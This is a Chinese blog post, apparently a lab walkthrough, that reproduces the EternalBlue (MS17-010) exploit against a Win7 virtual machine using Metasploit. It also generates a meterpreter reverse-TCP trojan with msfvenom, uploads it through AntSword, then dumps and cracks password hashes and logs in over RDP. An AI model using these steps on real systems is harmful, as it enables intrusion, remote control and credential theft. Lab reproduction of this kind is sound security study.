基于实验环境的永恒之蓝(MS17-010)漏洞复现实践
我们在上一篇文章用蚁剑连接了win7之后,接下来我们打开kali的终端输入msfconsole

显示msf6我就可以接着输入search ms17然后他会显示出工具中所有带有ms17的工具

然后我们先输入use 24,使用这个工具来检查win7中是否存在漏洞可以攻击

接着我们输入show options看一下工具配置有哪些需要填(注:required为yes就是必须要填的)

这里可以看到rhosts是必填但是他现在是空的,所以我们输入set rhosts 靶机ip,填好之后我们可以输入show missing检查所有必填是否填完

然后开始运行,这里可以看到靶机是有漏洞可以攻击的

然后我们就可以输入use 0利用这个工具进行攻击,使用方法和上面一样先配置再运行,但是这里面修改的LHOST是填我们本机也就是kali的IP地址

配置好以后我们run一下出现这个页面就是成功打开了win7的终端

然后我们ctrl+shift+T打开一个新的终端输入“msfvenom -p windows/meterpreter/reverse_tcp LHOST=本机ip LPORT=9527 -f exe > info.exe”生成一个木马文件

然后我们用蚁剑上传木马文件

然后我们就可以设置一个监听模块,在msf6中搜/hand

同样use 7,然后开始配置,注意的是这里我们还要改payload(注:这里的LPORT要改为你之前生成木马文件的监听接口9527)

我们这时候用蚁剑运行info.exe

我们返回kali可以看到出现meterpreter,输入getuid显示如图证明成功

然后我们把info.exe的进程改一下

这样就能在蚁剑中删除info.exe
我们用hashdump获取密码然后破解密码

重新打开一个终端输入rdesktop 192.168.74.130,然后把获得的密码输入就可以远程链接win7虚拟机了


浙公网安备 33010602011771号